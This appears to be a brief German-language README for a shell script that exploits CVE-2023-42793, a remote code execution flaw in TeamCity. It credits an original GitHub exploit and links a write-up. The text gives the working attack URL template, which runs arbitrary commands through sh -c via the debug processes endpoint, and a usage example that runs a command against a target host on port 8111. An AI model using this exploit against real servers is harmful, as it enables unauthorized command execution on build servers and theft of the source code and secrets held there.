
teamcity-exploit-cve-2023-42793
Ein schnelles Skript, um den cve-2023-42793 Bug auszunutzen. Weitere Informationen zum Exploit finden Sie hier:
https://www.cnblogs.com/LittleHann/p/17843271.html
Dieses Skript fügt die Möglichkeit hinzu, "params" frei zu verwenden, um nach dem Auslösen des RCE-Bugs Befehle auszuführen:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
Das originale Skript ist hier, die volle Anerkennung gebührt den Autoren: https://github.com/Zenmovie/CVE-2023-42793